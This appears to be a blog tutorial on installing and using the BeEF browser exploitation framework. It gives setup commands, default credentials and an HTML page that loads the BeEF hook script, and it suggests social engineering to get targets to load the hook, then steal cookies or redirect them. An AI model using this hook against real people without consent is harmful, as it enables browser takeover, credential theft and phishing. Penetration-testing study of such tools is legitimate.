Beef - Browser Exploitation Framework

 









What is BeEF?

BeEF is an open-source security tool designed to exploit vulnerabilities in web browsers. It allows penetration testers to assess the security posture of a target environment by using the web browser as a pivot point. By taking advantage of the trust users place in their browsers, BeEF can explore a wide array of attack vectors and execute various payloads.


Key Features of BeEF

  1. Browser Hooking: BeEF works by "hooking" a web browser, which means it injects a script into the target browser. Once the browser is hooked, it can be controlled remotely.
  2. Command Modules: BeEF includes numerous modules that can execute different types of attacks and exploits, such as keylogging, phishing, network reconnaissance, and more.
  3. Integration: BeEF can be integrated with other penetration testing tools like Metasploit to enhance its capabilities.
  4. Cross-Origin Requests: It can exploit vulnerabilities to make cross-origin requests, allowing it to bypass same-origin policy restrictions in certain contexts.


Step 1: Install Dependencies

Before installing BeEF, ensure that your system has the required dependencies.

sudo apt-get update

sudo apt-get install git curl sqlite3 ruby-full build-essential


Step 2: Clone the BeEF Repository
git clone https://github.com/beefproject/beef.git


Step 3: Install BeEF
cd beef
./install

Step 4: Start BeEF
./beef

By default, BeEF runs on http://localhost:3000/ui/panel. The default credentials for the web interface are beef for both the username and password.

Step 5: Access the BeEF Web Interface

Open your web browser and go to http://localhost:3000/ui/panel. Log in using the default credentials.

Step 6: Hook a Browser

To hook a browser, you need to get the target to execute a BeEF hook script. The hook script URL typically looks like this:

http://<beef_server_ip>:3000/hook.js

You can include this script in a web page you control, or use social engineering techniques to get the target to visit a page that includes the script.

Step 7: Using BeEF to Exploit

Once a browser is hooked, it will appear in the BeEF control panel. You can now use various modules to test and exploit the hooked browser.

  1. Select the Hooked Browser: In the BeEF control panel, you will see a list of hooked browsers under "Hooked Browsers."
  2. Choose an Exploit: Select a module from the "Commands" section. For example, you can choose the "Alert Dialog" module to display an alert box on the target browser.
  3. Execute the Command: Fill in any required parameters for the selected module and click "Execute."

Example: Running an Alert Command

  1. Navigate to "Commands" in the left panel.
  2. Choose a command like "Social Engineering" -> "Alert Dialog."
  3. Enter the text you want to display in the alert box.
  4. Click "Execute."
Html Page for injecting
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BeEF Hook Example</title>
</head>
<body>
    <h1>Welcome to the BeEF Hook Example Page</h1>
    <p>This is a demonstration of how to include the BeEF hook script in a web page.</p>

    <!-- BeEF Hook Script -->
    <script src="http://localhost:3000/hook.js"></script>
</body>
</html>

You can execute commands via alert, browser - cookies , audio , redirect to any website.

Comments

Post a Comment

Popular posts from this blog

Linux Commands part - 2

Image
$ file images.png output- Dimensions file type 8 bit color map $less file.txt this command shows overwhelm text in one screen at a time. $sudo apt install imagemagick $identify images.png Gives the properties of the images etc... $mkdir -p /home/Desktop/maverick/Documents/MyDocuments/ This command gonna create sub-directory. $ mkdir -p Soumya/Documents/Kali.pdf/ | touch mk.txt Find $ $ find /home -name puppies.jpg $ $ find /home -type d -name MyFolder $help $man $whatis ls Oneliner help this command will explain the command in one line. 18. alias Sometimes typing commands can get really repetitive, or if you need to type a long command many times, it’s best to have an alias you can use for that. To create an alias for a command you simply specify an alias name and set it to the command. $ alias foobar='ls -la' Now instead of typing ls -la, you can type foobar and it will execute that command, pretty neat stuff. Keep in mind that this command won't save your alias after rebo
Read more